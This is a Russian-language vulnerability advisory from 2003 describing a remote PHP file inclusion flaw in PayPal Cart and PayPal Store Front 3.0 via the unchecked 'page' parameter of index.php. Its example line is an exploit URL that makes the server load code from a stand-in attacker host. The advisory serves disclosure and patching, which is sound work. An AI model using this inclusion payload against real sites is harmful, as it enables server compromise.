Выполнение произвольного PHP кода в PayPal Cart и PayPal Store Fron
| Дата публикации: | 10.10.2003 |
| Всего просмотров: | 1094 |
| Опасность: | Высокая |
| Наличие исправления: | Нет |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Компрометация системы |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: |
PayPal Cart
PayPal Store Front 3.x |
| Уязвимые версии: PayPal Cart, PayPal Store Front 3.0 и более ранние версии
Описание: Уязвимость обнаружена в PayPal Cart и PayPal Store Front. Злонамеренный пользователь может выполнить произвольный PHP код на уязвимом сервере. Программное обеспечение не проверяет параметр "page" в сценарии "index.php". В результате удаленный пользователь может выполнить произвольный PHP код с привилегиями Web сервера. Пример/Эксплоит: http://www.vulnsite.com/index.php?do=ext&page=http://www.attacker.com/index Где http://www.attacker.com/index.php URL производителя:http://www.muziqpakistan.net/~taz/ Решение: Установите неофициальное исправление: http://www.zone-h.org/download/file=4957 |
|
| Ссылки: | ZH2003-30SA (security advisory): file inclusion vulnerability in PayPal Store Front |